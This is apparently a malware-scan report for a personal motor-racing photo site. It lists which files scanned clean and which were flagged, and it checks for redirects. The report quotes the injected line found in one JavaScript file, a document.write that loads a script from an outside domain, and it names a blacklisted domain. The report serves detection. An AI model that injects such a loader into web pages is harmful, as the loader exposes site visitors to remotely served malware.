Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=absw04543.pwp.blueyonder.co.uk
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.absw04543.pwp.blueyonder.co.uk/ | 200 OK Content-Length: 15024 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jbhq.co.uk | ||
http://www.absw04543.pwp.blueyonder.co.uk/home/index.html | 200 OK Content-Length: 2789 Content-Type: text/html | clean |
http://www.absw04543.pwp.blueyonder.co.uk/home/navcond.js | 200 OK Content-Length: 44039 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script src="http://www.creditrehabvacaville.com/CQjhX1uO.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.absw04543.pwp.blueyonder.co.uk/test404page.js | 404 Not found Content-Length: 1000 Content-Type: text/html | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Keith Holland -- F5000 Trojan - ROC.jpg | 200 OK Content-Length: 56300 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Keith Holland -- Trojan - Daily Mail ROC.jpg | 200 OK Content-Length: 60773 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Tony Trimmer -- ISO-Marlboro - ROC.jpg | 200 OK Content-Length: 63895 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Frank Gardner & Brian Muir -- TT.jpg | 200 OK Content-Length: 117178 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Gerry Birrell -- Chevron-Hart =- Clark Memorial Hockenheim.jpg | 200 OK Content-Length: 75496 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Jochen Mass & Derek Bell -- Surtees TS15s - Hochenheim.jpg | 200 OK Content-Length: 55894 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Jochen Mass Surtees -- TS15 - Paul Ricard.jpg | 200 OK Content-Length: 51308 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730419 Niven v. Dryden - Ingliston.jpg | 200 OK Content-Length: 83829 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730426 Colin Vandervell & Roger Williamson -- March-BMW & Wheatcroft GRD - Thruxton.jpg | 200 OK Content-Length: 99500 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730426 Jock Russell -- McRae where - u got Ingliston Russell pics.jpg | 200 OK Content-Length: 122535 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730524 Chris Amon -- Tecno-Pederzani - 6thZolder.jpg | 200 OK Content-Length: 95509 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Referer: http://www.google.com/search?q=absw04543.pwp.blueyonder.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.